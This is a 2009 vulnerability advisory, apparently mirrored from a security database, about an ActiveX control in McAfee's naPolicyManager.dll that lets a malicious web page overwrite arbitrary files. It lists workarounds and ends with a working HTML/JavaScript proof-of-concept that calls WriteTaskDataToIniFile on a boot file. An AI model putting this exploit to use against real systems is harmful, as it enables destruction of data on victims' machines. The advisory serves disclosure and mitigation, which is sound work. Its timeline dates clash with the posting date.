McAfee 3.6.0.608 naPolicyManager.dll ActiveX Arbitrary Data Write Vuln

2009-06-17T00:00:00
ID SSV:11627
Type seebug
Reporter Root
Modified 2009-06-17T00:00:00

Description

No description provided by source.

                                        
                                            
                                                GOODFELLAS Security Research TEAM
http://goodfellas.shellcode.com.ar
Greetings to str0ke

McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write
==============================================================================

Internal ID: VULWAR20090616.
-----------

Introduction
------------

naPolicyManager.dll is a library included in the Program Mc Afee inc.


Tested In
---------

- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------

The WriteTaskDataToIniFile method doesn't check if it's being called from the
application or from a malicious user. A Remote Attacker could craft a 
html page and overwrite arbitrary files in a system.


Impact
------

The vulnerability could allow malicious users to write arbitrary data on a 
vulnerable system that uses this software.


Workaround
----------

- Activate the Kill bit zero in the clsid corresponding to the software.
- Unregister naPolicyManager.dll using regsvr32.


Timeline
--------

July 16 2009 -- Bug Discovery.
July 16 2009 -- POC published.


Credits
-------

 * callAX <bemariani@gmail.com>


Technical Details
-----------------

WriteTaskDataToIniFile method receives one argument filename in this format
"c:\path\file".


Proof of Concept
---------------

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-CAC099CA4741}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "C:\b00t.ini"
   ctrl.WriteTaskDataToIniFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>